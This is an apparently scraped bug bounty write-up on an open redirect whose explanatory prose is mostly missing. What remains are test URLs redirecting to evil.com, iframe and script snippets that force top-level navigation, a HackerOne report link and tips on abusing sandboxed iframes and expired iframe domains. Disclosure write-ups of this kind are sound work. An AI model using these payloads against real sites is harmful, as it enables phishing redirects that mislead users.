1000$ for Open redirect via unknown technique [BugBounty writeup]

https://example.com/login?redirectUrl=https://app.example.com
https://example.com/login?redirectUrl=https://evil.com
<iframe src="https://example.com" id="child"></iframe>
<script>
var a = document.getElementById("child").contentWindow.document;
console.log(a.body.innerHTML);
</script>
<iframe src="http://ruvlolmail.temp.swtest.ru/toplevel.html">
<html>
<head>
</head>
<body>
<script>
top.window.location = "https://www.google.com"
</script>
</body>
</html>
<iframe sandbox="allow-scripts allow-same-origin" src="http://ruvlolmail.temp.swtest.ru/toplevel.html">
https://hackerone.com/reports/437142
  • If you can insert iframe with arbitrary URL value (for example, on a forum), check if it has sandbox attribute and allows top-level-navigation
  • If there is iframe pointing to expired domain, you could try to claim it and place your script.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store